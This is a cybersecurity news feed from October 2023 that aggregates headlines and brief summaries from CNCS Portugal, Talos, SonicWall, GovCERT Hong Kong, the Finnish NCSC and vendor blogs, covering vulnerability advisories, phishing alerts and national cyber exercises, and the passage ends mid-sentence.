A Team Portugal que conta com 10 jovens talentos, dos escalões júnior e sénior, está a participar no European Cybersecurity Challenge 2023 (ECSC 2023), uma iniciativa organizada pela Universidade Norueguesa de Ciência e Tecnologia (NTNU), com o apoio da ENISA - Agência Europeia para a Segurança das Redes e da Informação e da Comissão Europeia. A competição deste ano leva a jogo equipas oriundas de 35 países, compostas por 10 jovens talentos captados através das iniciativas nacionais representado as cores do seu país. Pela primeira vez Portugal tem representação feminina entre os membros da equipa selecionados. Os jovens talentos da Team Portugal foram selecionados no âmbito da iniciativa Cybersecurity Challenge PT, que resulta da cooperação entre o Centro Nacional de Cibersegurança (CNCS), o Instituto Superior Técnico (IST), a Universidade do Porto (UP) e a Associação Portuguesa para a Promoção da Segurança da Informação (AP2SI). O ECSC 2023, que se poderá qualificar como a mais importante competição deste tipo na Europa, visa não só promover a identificação de talentos em cibersegurança, como também a cooperação e sentido de comunidade. Com este desígnio, ao longo de três dias, as equipas são desafiadas a resolver problemas relacionados com a segurança informática em vários domínios: de ataque e defesa a segurança web, passando por segurança móvel, hardware, criptografia, engenharia reversa ou forense. O Cybersecurity ChallengePT está enquadrado num programa de formação e treino abrangente, cujo objetivo passa por capacitar o país de recursos nas áreas de cibersegurança e segurança da informação, e com isto atrair, desde cedo, estudantes do ensino secundário e ensino superior. Este ano, durante as várias iniciativas que integraram a preparação, divulgação e prova de competição final, o Cybersecurity ChallengePT contou com cerca de 350 estudantes inscritos nas várias atividades desenvolvidas. Recorde-se que em 2022, Portugal terminou em 16.º lugar no European Cybersecurity Challenge, de entre 33 equipas participantes. Já no International Cybersecurity Challenge 2023, que decorreu em agosto, nos EUA, a Team Europe voltou a conquistar o primeiro lugar e contou com um treinador e um jogador português. Conheça a Team Portugal através do vídeo: https://youtu.be/wDL2v56Qa1M.

https://dyn.cncs.gov.pt/pt/detalhe/art/135807/team-portugal-na-oitava-edicao-do-european-cybersecurity-challenge
Numbers turned weapons: DoS in Osmosis’ math library
2023-10-23T18:27:31Z | 1698085651

Trail of Bits is publicly disclosing a vulnerability in the Osmosis chain that allows an attacker to craft a transaction that takes up a disproportionate amount of compute time on Osmosis nodes compared to the amount of gas it consumes. Using the vulnerability, an attacker can halt the Osmosis chain by spamming […]

https://blog.trailofbits.com/2023/10/23/numbers-turned-weapons-dos-in-osmosis-math-library/
Get EdgeWorkers Error Reports with mPulse
2023-10-23T13:00:00Z | 1698066000

https://www.akamai.com/blog/edge/2023/oct/get-edgeworkers-error-reports-with-mpulse
Yellow alert: Data breaches in Microsoft 365 accounts as a result of phishing
2023-10-23T12:05:26Z | 1698062726

Criminals are phishing Microsoft 365 passwords with fake email messages. The usernames and passwords acquired by phishing can be used by the criminals to break into M356 accounts. Dozens of Finnish organisations have reported phishing messages and new data breaches. The phishing campaign spreads between organisations through the contacts of the hacked user accounts.

https://www.kyberturvallisuuskeskus.fi/en/news/yellow-alert-data-breaches-microsoft-365-accounts-result-phishing
Yellow alert: Data breaches in Microsoft 365 accounts as a result of phishing
2023-10-23T12:05:26Z | 1698062726

Criminals are phishing Microsoft 365 passwords with fake email messages. The usernames and passwords acquired by phishing can be used by the criminals to break into M356 accounts. Dozens of Finnish organisations have reported phishing messages and new data breaches. The phishing campaign spreads between organisations through the contacts of the hacked user accounts.

https://www.kyberturvallisuuskeskus.fi/en/news/yellow-alert-data-breaches-microsoft-365-accounts-result-phishing
6 Steps for CIOs To Keep Their IT Staff Happy
2023-10-23T07:16:15Z | 1698045375

According to a recent Yerbo survey, 40% of IT professionals are at high risk of burnout. In fact, and perhaps even more alarming, 42% of them plan to quit their company in the next six months. And yet, according to Deloitte, 70% of professionals across all industries feel their employers are not doing enough to... The post 6 Steps for CIOs To Keep Their IT Staff Happy appeared first on Cato Networks.

https://www.catonetworks.com/blog/6-steps-for-cios-to-keep-their-it-staff-happy/
The Value of NDR Use Cases for Your SIEM by Vectra AI Product Team
2023-10-21T00:00:00Z | 1697846400

If you are in security operations, have you ever wondered how long it will take before use cases & playbooks are ready or prove value to your organization?

https://www.vectra.ai/blog/the-value-of-ndr-use-cases-for-your-siem
A wave of data breaches is spreading between organisations – cut off the phishing
2023-10-20T16:51:15Z | 1697820675

Email accounts of Finnish organisations are being hijacked through a widely-spread phishing campaign. Criminals have been phishing the usernames and passwords of employees via email and scam pages, using the credentials to log in to Microsoft 365 email systems. The hijacked accounts are used to send new phishing messages both within the organisation and to other organisations.

https://www.kyberturvallisuuskeskus.fi/en/wave-data-breaches-spreading-between-organisations-cut-phishing
Detect and Remediate Attacks: Practical Applications for Machine Learning
2023-10-20T13:00:00Z | 1697806800

https://www.akamai.com/blog/security/2023/oct/detect-and-remediate-attacks-with-akamai-hunt
Security Alert (A23-10-20): Multiple Vulnerabilities in Apache HTTP Server
2023-10-20T04:00:00Z | 1697774400

The Apache Software Foundation released a security update to address multiple vulnerabilities in the HTTP Server and its modules.

https://www.govcert.gov.hk/en/alerts_detail.php
Unpacking CVE-2023-20198: A Critical Weakness In Cisco IOS XE:
2023-10-20T00:00:00Z | 1697760000

Explore an in-depth analysis of the critical software Web UI Privilege Escalation Vulnerability, CVE-2023-20198, in Cisco IOS XE. Learn about its exploitation in the wild, the threat it poses, and the current lack of a patch. Understand how it's leveraged for initial access and the subsequent delivery of an implant through an undetermined mechanism. Also discover how GreyNoise can help provide timely intelligence surrounding activity related to these Cisco IOS XE systems.‍

https://www.greynoise.io/blog/unpacking-cve-2023-20198-a-critical-weakness-in-cisco-ios-xe
Deep Analysis of Hospitality Phishing Campaign Shows Global Threat
2023-10-19T14:00:00Z | 1697724000

https://www.akamai.com/blog/security-research/2023/oct/hospitality-phishing-campaign-DNS-analysis-global-threat
How Fraudsters Execute Account Opening Abuse
2023-10-19T13:00:00Z | 1697720400

https://www.akamai.com/blog/security/2023/oct/how-fraudsters-execute-account-opening-abuse
The PoP Smackdown: Cato vs. Competitors…Which Will Dominate Your Network?
2023-10-19T08:21:37Z | 1697703697

In the world of professional wrestling, one thing separates the legends from the rest: their presence in the ring. Like in wrestling, the digital world demands a robust and reliable presence for the ultimate victory. Enter Cato Networks, the undisputed champion regarding Secure Access Service Edge (SASE) Points of Presence (PoPs). In this blog post,... The post The PoP Smackdown: Cato vs. Competitors…Which Will Dominate Your Network? appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-pop-smackdown-cato-vs-competitorswhich-will-dominate-your-network/
JustSystems Corporation Ichitaro 2023 DocumentViewStyles and DocumentEditStyles stream relative write vulnerabilities
2023-10-19T00:00:00Z | 1697673600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1825
JustSystems Corporation Ichitaro 2023 HyperLinkFrame parser integer overflow vulnerability
2023-10-19T00:00:00Z | 1697673600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1808
JustSystems Corporation Ichitaro 2023 HyperLinkFrame parser out-of-bounds write vulnerability
2023-10-19T00:00:00Z | 1697673600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1809
JustSystems Corporation Ichitaro "Figure" stream use-after-free vulnerability
2023-10-19T00:00:00Z | 1697673600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1758
Balanço positivo do Exercício Nacional de Cibersegurança
2023-10-19T00:00:00Z | 1697673600

Terminou a quarta edição do Exercício Nacional de Cibersegurança (ExNCS’23), organizado pelo Centro Nacional de Cibersegurança (CNCS), em cooperação com a Agência da União Europeia para a Cibersegurança (ENISA), e com o apoio da Associação Nacional de Municípios portugueses (ANMP) e das 25 Entidades Intermunicipais Portuguesas, que decorreu a 17 e 18 de outubro. Durantes dois dias, mais de 270 câmaras municipais participaram, a partir das instalações disponibilizadas pelas 25 entidades intermunicipais, na ação do CNCS, cujo objetivo é analisar o grau de maturidade das autarquias, bem como testar a sua capacidade de resposta a incidentes e proficiência na aplicação do Regime Jurídico de Segurança do Ciberespaço Foram perto de 1000 pessoas, diferentes departamentos, entidades e autoridades a trabalhar em rede para aumentar a capacidade de resiliência dos municípios, com o objetivo de dar resposta aos desafios propostos pelos três cenários criados: Cenário de ataque coordenado de ransomware, para o coordenador do CNCS, Lino Santos, “a grande preocupação do momento”, que exploram o elo mais fraco de uma infraestrutura, muitas vezes o fator humano; Cenário que procurou comprometer os serviços centrais prestados pelas autarquias, nomeadamente serviços online; Cenário mais avançado, que conduziu a uma situação de crise, no qual foram afetados os sistemas de mobilidade e de energia de alguns dos municípios com projetos de cidade inteligente. De destacar alguns números do ExNCS’23: Mais de 270 municípios Cerca de 1000 participantes Mais de 15 000 injects enviados Mais de 1000 relatórios submetidos O resultado do ExNCS’23 foi, segundo o coordenador do CNCS, Lino Santos, “uma boa resposta por parte dos municípios”, que permitiu perceber quem é quem e promover uma maior cooperação entre as autarquias e as autoridades que permita uma “resposta em rede”. Coube ao Diretor-geral do Gabinete Nacional de Segurança (GNS), Contra-almirante António Gameiro Marques, encerrar a quarta edição do Exercício Nacional de Cibersegurança, da qual destacou o “incremento da força do trabalho em rede”. “Testámos e fomentámos a articulação dentro das organizações e a cooperação entre municípios, que passaram a conhecer-se e a estar lado a lado a resolver problemas”. Para o Diretor-geral do GNS, o ExNCS’23 também destacou os laços de confiança estabelecidos entre todos. A sede da comunidade intermunicipal do Oeste, nas Caldas da Rainha serviu de base à sala de controlo do Exercício Nacional de Cibersegurança 2023 (ExNCS’23), onde também estiveram entidades de relevo, nomeadamente a Autoridade Nacional de Comunicações (ANACOM), a Comissão Nacional de Proteção de Dados (CNPD), o Comando das Operações de Ciberdefesa (COCiber), a LUSA – Agência de Notícias de Portugal, a Polícia Judiciária (PJ), os Serviços de Informações de Segurança (SIS), entre outras. No primeiro dia do ExNCS’23, a mensagem, em vídeo, do secretário de Estado da Digitalização e Modernização Administrativa, Mário Campolargo difundida, em simultâneo, para todas as Comunidades Intermunicipais. Mário Campolargo agradeceu a participação no exercício e deixou o seu apreço pelo “importante trabalho que desenvolvem, diariamente, a criar um ambiente mais ciberseguro, no qual os municípios portugueses possam desempenhar a sua missão pelas suas populações e pelo país”. Já no segundo dia, o secretário-geral do Sistema de Segurança Interna, Paulo Vizeu Pinheiro, marcou presença na comunidade intermunicipal do Oeste, onde visitou a sala de controlo do ExNCS’23, a sala de realização do Exercício e a sala destinada às autoridades e outras entidades. Considerando o elevado grau de ameaça apresentado pelos cenários fictícios, também as entidades competentes nacionais tiveram oportunidade de exercitar a sua resposta numa situação de Crise, com impacto altamente disruptivo no ciberespaço de interesse nacional. Da quarta edição do Exercício Nacional de Cibersegurança dedicada à Cibersegurança nos Municípios Portugueses vai resultar a apresentação de resultados e a emissão de um relatório.  Imagem: Oeste CIM  

https://dyn.cncs.gov.pt/pt/detalhe/art/135805/balanco-positivo-do-exercicio-nacional-de-ciberseguranca
Beyond Hamas: Militant and Terrorist Groups Involved in the October 7 Attack on Israel
2023-10-18T16:49:10Z | 1697647750

Explore the military and terrorist groups collaborating with Hamas in the Israel-Hamas War, based on reports and open-source intelligence The post Beyond Hamas: Militant and Terrorist Groups Involved in the October 7 Attack on Israel appeared first on Flashpoint.

https://flashpoint.io/blog/israel-hamas-war-military-and-terrorist-groups/
Akamai Named an Overall Leader in Fraud Reduction Intelligence Platforms
2023-10-18T13:00:00Z | 1697634000

https://www.akamai.com/blog/security/2023/oct/akamai-named-leader-in-fraud-reduction-intelligence-platforms
Report: Ripples Across the Attack Surface
2023-10-18T13:00:00Z | 1697634000

Sometimes small events can have far-reaching consequences, such as when one organization's security incident affects third parties and the broader supply chain. We call these effects "ripple events" and have been studying them for years.

https://blog.riskrecon.com/resources/reports-and-whitepapers/new-report-ripples-across-the-attack-surface
The single-packet attack: making remote race-conditions 'local'
2023-10-18T12:54:01Z | 1697633641

The single-packet attack is a new technique for triggering web race conditions. It works by completing multiple HTTP/2 requests with a single TCP packet, which effectively eliminates network jitter an

https://portswigger.net/research/the-single-packet-attack-making-remote-race-conditions-local
Rocking IT Success: The TAG Heuer Porsche Formula E Team’s City-Hopping Tour with SASE TAG Heuer Porsche Formula E Team
2023-10-18T12:48:15Z | 1697633295

Picture this: A rock band embarking on a world tour, rocking stages in different cities with thousands of adoring fans. But wait, behind the scenes, there’s an unsung hero—the crew. They’re the roadies, the ones responsible for building the infrastructure that supports the band’s electrifying performances in each new location. Now, let’s take that same... The post Rocking IT Success: The TAG Heuer Porsche Formula E Team’s City-Hopping Tour with SASE TAG Heuer Porsche Formula E Team appeared first on Cato Networks.

https://www.catonetworks.com/blog/rocking-it-success-the-tag-heuer-porsche-formula-e-teams-city-hopping-tour-with-sase-tag-heuer-porsche-formula-e-team/
Sophos AI team to present at CAMLIS
2023-10-18T12:42:04Z | 1697632924

The conference on machine learning in cybersecurity is key to open exchange of research and knowledge.

https://news.sophos.com/en-us/2023/10/18/sophos-ai-team-to-present-at-camlis/
RIA hoiatab: Cisco võrguseadmeid ohustab väga kriitiline turvanõrkus
2023-10-18T07:51:02Z | 1697615462

Riigi Infosüsteemi Amet (RIA) avaldas ohuhinnangu, sest Cisco IOS XE tarkvara veebiliidest (webUI) mõjutab äärmiselt kriitiline turvanõrkus, mida on ettevõtte teatel juba ära kasutatud.

https://ria.ee/uudised/ria-hoiatab-cisco-vorguseadmeid-ohustab-vaga-kriitiline-turvanorkus
Security Alert (A23-10-19): Multiple Vulnerabilities in Oracle Java and Oracle Products (October 2023)
2023-10-18T04:00:00Z | 1697601600

Oracle has released the Critical Patch Update (CPU) Advisory with collections of patches for multiple security vulnerabilities found in Java SE and various Oracle products.

https://www.govcert.gov.hk/en/alerts_detail.php
FIRST POST: Oct-Dec 2023
2023-10-18T00:00:00Z | 1697587200

Message from the Chair; CVSS v4.0 is now available; The Board in Oslo; Migrating to the new FIRST SSO; SIGs; On the Road to Fukuoka / Call for presentations; New Teams Members: August, September, October; Upcoming Events

https://www.first.org/newsroom/post/202310
Information Security Trailblazer award for Keuda, the Central Uusimaa educational community association
2023-10-17T12:04:14Z | 1697544254

This year, the Information Security Trailblazer award given out by the Finnish Transport and Communications Agency Traficom was awarded to the Central Uusimaa educational community association Keuda. In the justifications for the award, Keuda was thanked, among other things, for open communication, after it became the target of a cyber-attack with ransomware in November 2022.

https://www.kyberturvallisuuskeskus.fi/en/news/information-security-trailblazer-award-keuda-central-uusimaa-educational-community-association
Information Security Trailblazer award for Keuda, the Central Uusimaa educational community association
2023-10-17T12:04:14Z | 1697544254

This year, the Information Security Trailblazer award given out by the Finnish Transport and Communications Agency Traficom was awarded to the Central Uusimaa educational community association Keuda. In the justifications for the award, Keuda was thanked, among other things, for open communication, after it became the target of a cyber-attack with ransomware in November 2022.

https://www.kyberturvallisuuskeskus.fi/en/news/information-security-trailblazer-award-keuda-central-uusimaa-educational-community-association
Networking and Security Teams Are Converging, Says SASE Adoption Survey
2023-10-17T12:00:00Z | 1697544000

Converging networking with security is fundamental to creating a robust and resilient IT infrastructure that can withstand the evolving cyber threat landscape. It not only protects sensitive data and resources but also contributes to the overall success and trustworthiness of an organization.   And just as technologies are converging, networking and security teams are increasingly working... The post Networking and Security Teams Are Converging, Says SASE Adoption Survey  appeared first on Cato Networks.

https://www.catonetworks.com/blog/networking-and-security-teams-are-converging-says-sase-adoption-survey/
Unveiling Insights: 2023 SASE Adoption Survey
2023-10-17T12:00:00Z | 1697544000

The post Unveiling Insights: 2023 SASE Adoption Survey appeared first on Cato Networks.

https://www.catonetworks.com/resources/unveiling-insights-2023-sase-adoption-survey/
The National Cyber Security Centre Finland’s weekly review – 41/2023
2023-10-17T10:01:40Z | 1697536900

This week we take a look at the recent denial-of-service attacks carried out against Finnish organisations and bank credential phishing in the name of the Finnish Tax Administration, among other topics.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-412023
The National Cyber Security Centre Finland’s weekly review – 41/2023
2023-10-17T10:01:40Z | 1697536900

This week we take a look at the recent denial-of-service attacks carried out against Finnish organisations and bank credential phishing in the name of the Finnish Tax Administration, among other topics.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-412023
SonicOS affected by multiple vulnerabilities
2023-10-17T08:58:17Z | 1697533097

The SonicOS Management web interface and SSLVPN portal have been impacted by several vulnerabilities, which are listed below. SonicWall strongly advises organizations using earlier versions of SonicOS firmware to upgrade to the latest firmware releases.Note: It's important to note that the vulnerabilities mentioned below have no impact on SonicWall SSLVPN SMA100 and SMA1000 series products. Additionally, there is no substantiated evidence to suggest that these vulnerabilities are currently being actively exploited in real-world scenarios.1) CVE-2023-39276 - Post-authentication Stack-Based Buffer Overflow Vulnerability in the getBookmarkList.json URL endpoint leads to a firewall crash.CVSS Score: 7.7CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:HCWE-121: Stack-based Buffer Overflow2) CVE-2023-39277 - Post-authentication Stack-Based Buffer Overflow Vulnerability in the sonicflow.csv, appflowsessions.csv endpoints leads to a firewall crash.CVSS Score: 7.7CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:HCWE-121: Stack-based Buffer Overflow3) CVE-2023-39278 - Post-authentication user assertion failure leads to Stack-Based Buffer Overflow vulnerability via main.cgi leads to a firewall crash.CVSS Score: 7.7CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:HCWE-121: Stack-based Buffer Overflow4) CVE-2023-39279 - Post-Authentication Stack-Based Buffer Overflow Vulnerability in the getPacketReplayData.json URL endpoint leads to a firewall crash.CVSS Score: 7.7CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:HCWE-121: Stack-based Buffer Overflow5) CVE-2023-39280 - Post-authentication Stack-Based Buffer Overflow Vulnerability in the ssoStats-s.xml, ssoStats-s.wri endpoints leads to a firewall crash.CVSS Score: 7.7CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:HCWE-121: Stack-based Buffer Overflow6) CVE-2023-41711 - Post-authentication Stack-Based Buffer Overflow Vulnerability in the sonicwall.exp, prefs.exp endpoints leads to a firewall crash.CVSS Score: 7.7CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:HCWE-121: Stack-based Buffer Overflow7) CVE-2023-41712 - Post-authentication Stack-Based Buffer Overflow Vulnerability in the SSL VPN's plainprefs.exp URL endpoint leads to a firewall crash.CVSS Score: 7.7CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:HCWE-121: Stack-based Buffer Overflow8) CVE-2023-41713 - Use of Hard-coded Password in 'dynHandleBuyToolbar' demo function.CVSS Score: 4.3CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:NCWE-259: Use of Hard-coded Password9) CVE-2023-41715 - Post-authentication Improper Privilege Management vulnerability in the SonicOS SSL VPN Tunnel allows users to elevate their privileges inside the tunnel.CVSS Score: 6.4CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:LCWE-269: Improper Privilege Management CVE: CVE-2023-39276, CVE-2023-39277, CVE-2023-39278, CVE-2023-39279, CVE-2023-39280, CVE-2023-41711, CVE-2023-41712, CVE-2023-41713, CVE-2023-41715 Last updated: Oct. 17, 2023, 8:58 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0012
High Threat Security Alert (A23-10-17): Multiple Vulnerabilities in Cisco IOS XE Software
2023-10-17T04:00:00Z | 1697515200

Cisco released a security advisory to address multiple vulnerabilities in Cisco IOS XE Software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-10-18): Multiple Vulnerabilities in SonicWall Products
2023-10-17T04:00:00Z | 1697515200

SonicWall has released a security advisory to address multiple vulnerabilities in SonicOS which is the operating system for SonicWall firewalls.

https://www.govcert.gov.hk/en/alerts_detail.php
The Defenders’ Dilemma - The need for time & tools that build skills and expertise by Mark Wojtasiak
2023-10-17T00:00:00Z | 1697500800

The best ways to improve defenders’ skills and expertise and build confidence that ongoing security investments continue to provide ROI.

https://www.vectra.ai/blog/the-defenders-dilemma-the-need-for-time-tools-that-build-skills-and-expertise
Precursor: A Quantum Leap in Arbitrary Payload Similarity Analysis
2023-10-17T00:00:00Z | 1697500800

Discover Precursor, a revolutionary tool for payload similarity analysis in data science and cybersecurity. Dive deep into its features, potential applications, and how it can enhance your work in threat intelligence, malware detection, and network traffic analysis. Learn more now!"

https://www.greynoise.io/blog/precursor-a-quantum-leap-in-arbitrary-payload-similarity-analysis
How Akamai Protects Customers from HTTP/2 Rapid Reset DDoS Attacks
2023-10-16T05:00:00Z | 1697432400

https://www.akamai.com/blog/security/2023/oct/akamai-protects-customers-http2-rapid-reset-ddos-attacks
Security Alert (A23-10-14): Multiple Vulnerabilities in Microsoft Edge
2023-10-16T04:00:00Z | 1697428800

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-10-15): Multiple Vulnerabilities in QNAP Products
2023-10-16T04:00:00Z | 1697428800

QNAP has published security advisories to address multiple vulnerabilities in QNAP products.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A23-10-16): Vulnerability in HTTP/2 protocol
2023-10-16T04:00:00Z | 1697428800

A vulnerability (CVE-2023-44487) was found in HTTP/2 protocol.

https://www.govcert.gov.hk/en/alerts_detail.php
Centros Coordenação Nacionais em cibersegurança reunem-se em Atenas
2023-10-16T00:00:00Z | 1697414400

A rede de Centros de Coordenação Nacionais (NCCs) reuniu-se em Atenas (Grécia), a 11 de outubro, nas instalações da Agência da União Europeia para a Cibersegurança (ENISA). A reunião de NCCs juntou representantes dos Estados-Membros da União Europeia, da Comissão Europeia e da Agência da União Europeia para a cibersegurança - ENISA. Após a recente adoção do seu regulamento interno, a rede de NCCs iniciou a reunião com a eleição do presidente da Estónia e de dois vice-presidentes da Polónia e da França. Os participantes também trocaram pontos de vista sobre várias questões de interesse comum, incluindo o registo dos membros da comunidade cibernética e a agenda estratégica do Centro Europeu de Competências em Cibersegurança (ECCC). A reunião da rede de NCCC continuou nos dias 12 e 13 de outubro com a 7.ª reunião do Conselho de Administração do Centro Europeu de Competências em Cibersegurança. O ECCC debateu, entre outros assuntos, o Relatório Anual de Atividades do ECCC de 2022 e os Documentos de Programação Única para 2024-2026 e 2025-2027, a implementação em curso e futura das prioridades de cibersegurança no Programa Europa Digital (DEP) e no Horizonte Europa (incluindo um convite à apresentação de propostas em curso até 23 de novembro de 2023), o estado do estabelecimento do ECCC no que diz respeito à sua autonomia financeira e os progressos dos seus vários grupos de trabalho. Saiba mais em https://cybersecurity-centre.europa.eu/index_en.

https://dyn.cncs.gov.pt/pt/detalhe/art/135803/centros-coordenacao-nacionais-em-ciberseguranca-reunem-se-em-atenas
Business Continuity at Difficult Times of War in Israel
2023-10-13T14:47:19Z | 1697208439

As reported in global news, on October 7th, 2023, the Hamas terror organization has launched a brutal attack on Israeli cities and villages, with thousands of civilian casualties, forcing Israel to enter a state of war with Hamas-controlled Gaza. While Cato Networks is a global company with 850+ employees in over 30 countries around the... The post Business Continuity at Difficult Times of War in Israel appeared first on Cato Networks.

https://www.catonetworks.com/blog/business-continuity-at-difficult-times-of-war-in-israel/
4.ª edição do Exercício Nacional de Cibersegurança
2023-10-13T00:00:00Z | 1697155200

A 17 e 18 de outubro decorre mais uma edição do Exercício Nacional de Cibersegurança (ExNCS), organizado pelo Centro Nacional de Cibersegurança (CNCS) em cooperação com a Agência da União Europeia para a Cibersegurança (ENISA), e com o apoio da Associação Nacional de Municípios portugueses (ANMP) e das 25 Entidades Intermunicipais Portuguesas. Durante estes dois dias as instalações disponibilizadas pelas 25 entidades intermunicipais acolhem mais de 250 municípios aos quais se juntam outras entidades de relevo, nomeadamente a Autoridade Nacional de Comunicações (ANACOM), a Comissão Nacional de Proteção de Dados (CNPD), o Comando das Operações de Ciberdefesa (COCiber), a LUSA – Agência de Notícias de Portugal, a Polícia Judiciária (PJ), os Serviços de Informações de Segurança (SIS), entre outras. Ao longo dos dois dias de jogo, marcarão igualmente presença um conjunto de observadores. A sala de controlo do Exercício Nacional de Cibersegurança 2023 (ExNCS’23) está centralizada na sede da comunidade intermunicipal do Oeste, nas Caldas da Rainha. O Exercício Nacional de Cibersegurança 2023 (ExNCS’23) é dedicado à administração pública local. Tendo como pano de fundo o ecossistema municipal e todas as suas envolventes, a edição deste ano tem como objetivo sensibilizar os municípios para o tema da cibersegurança, analisar o respetivo grau de maturidade, bem como testar a sua capacidade de resposta a incidentes e proficiência na aplicação do Regime Jurídico de Segurança do Ciberespaço. Com um conjunto de cenários que refletem as principais ameaças ao ecossistema dos municípios, o Exercício Nacional de Cibersegurança 2023 (ExNCS’23) coloca em teste a resiliência digital da administração local e a capacidade das autoridades nacionais, para responder e recuperar a ciberataques de larga escala, com um particular enfoque nos elementos comuns e principais serviços que caracterizam as cidades inteligentes. O Centro Nacional de Cibersegurança (CNCS), no âmbito das suas competências enquanto Autoridade Nacional de Cibersegurança, organiza e realiza anualmente exercícios nacionais que permitem avaliar o grau de preparação e a maturidade das diversas entidades para lidar com incidentes de grande dimensão. Ao longo dos últimos anos, o CNCS tem participado no Cyber Europe 2016, NATO Cyber Defence Exercise Cyber Coalition Cyber, Cyber Perseu 2017 e Cyber SOPEx 2018. O CNCS organizou em 2018, 2019 e 2022 o Exercício Nacional de Cibersegurança (ExNCS), iniciativas que tiveram como premissa avaliar a capacidade de desenvolvimento de treino especializado em ciberdefesa e cibersegurança.

https://dyn.cncs.gov.pt/pt/detalhe/art/135800/4-edicao-do-exercicio-nacional-de-ciberseguranca
Akamai?s Perspective on October?s Patch Tuesday 2023
2023-10-12T14:00:00Z | 1697119200

https://www.akamai.com/blog/security-research/2023/oct/akamai-perspective-patch-tuesday-october-2023
Cato’s Analysis and Protection for cURL SOCKS5 Heap Buffer Overflow (CVE-2023-38545)
2023-10-12T13:46:36Z | 1697118396

TL;DR This vulnerability appears to be less severe than initially anticipated. Cato customers and infrastructure are secure. Last week the original author and long-time lead developer of cURL Daniel Stenberg published a “teaser” for a HIGH severity vulnerability in the ubiquitous libcurl development library and the curl command-line utility. A week of anticipation, multiple heinous... The post Cato’s Analysis and Protection for cURL SOCKS5 Heap Buffer Overflow (CVE-2023-38545) appeared first on Cato Networks.

https://www.catonetworks.com/blog/catos-analysis-and-protection-for-curl-socks5-heap-buffer-overflow-cve-2023-38545/
New paper: Nexus Android banking botnet – compromising C&C panels and dissecting mobile AppInjects
2023-10-12T08:45:00Z | 1697100300

In a new paper, researchers Aditya K Sood and Rohit Bansal provide details of a security vulnerability in the Nexus Android botnet C&C panel that was exploited in order to gather threat intelligence, and present a model of mobile AppInjects. Read more

https://www.virusbulletin.com/blog/2023/10/new-paper-nexus-android-banking-botnet-compromising-cc-panels-and-dissecting-mobile-appinjects/
Becoming a White Hat : An interview with a former Black Hat
2023-10-12T07:22:37Z | 1697095357

The post Becoming a White Hat : An interview with a former Black Hat appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-becoming-a-white-hat
SoftEther VPN vpnserver ConnectionAccept() denial-of-service vulnerability
2023-10-12T00:00:00Z | 1697068800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1743
SoftEther VPN vpnserver OvsProcessData denial of service vulnerability
2023-10-12T00:00:00Z | 1697068800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1737
SoftEther VPN ClientConnect() information disclosure vulnerability
2023-10-12T00:00:00Z | 1697068800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1768
SoftEther VPN CiRpcServerThread() MitM authentication bypass vulnerability
2023-10-12T00:00:00Z | 1697068800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1755
SoftEther VPN CiRpcAccepted() authentication bypass vulnerability
2023-10-12T00:00:00Z | 1697068800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1754
SoftEther VPN CtEnumCa() information disclosure vulnerability
2023-10-12T00:00:00Z | 1697068800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1753
SoftEther VPN vpnserver EnSafeHttpHeaderValueStr denial of service vulnerability
2023-10-12T00:00:00Z | 1697068800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1741
SoftEther VPN DCRegister DDNS_RPC_MAX_RECV_SIZE denial of service vulnerability
2023-10-12T00:00:00Z | 1697068800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1736
SoftEther VPN vpnserver WpcParsePacket() heap-based buffer overflow vulnerability
2023-10-12T00:00:00Z | 1697068800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1735
CNCS na IT Security Conference e na conferência War & Law: The Future of Conflict
2023-10-12T00:00:00Z | 1697068800

O coordenador do Centro Nacional de Cibersegurança, Lino Santos, marcou presença como keynote de abertura da IT Security Conference 2023, que decorreu a 12 de outubro em Lisboa, que deu destaque à voz dos CISO e à cibersegurança das organizações. Cibersegurança: o bom, o mau e o vilão serviu de base à intervenção do coordenador do CNCS, para fazer o ponto de situação da cibersegurança, em Portugal, resultado dos estudos desenvolvidos pelo Observatório de Cibersegurança do CNCS. Apostar mais na prevenção foi uma das notas deixadas por Lino Santos, referindo-se à necessidade de atacar o ransomware, “o maior vilão das organizações”, principal origem de violações de dados pessoais reportados à Comissão Nacional da Proteção de Dados, em 2022, com 110 casos (+57% do que em 2021). O coordenador do CNCS terminou a apresentação referindo que o desafio passa pela sensibilização e treino dos colaboradores, pelo desenvolvimento das capacidades, pela regulação e supervisão e pela resposta a incidentes.  Lino Santos destacou o papel da transposição da Nova Diretiva da União Europeia para a Cibersegurança, - NIS 2 - que substitui a NIS 1 e a nova Estratégia Nacional de Segurança no 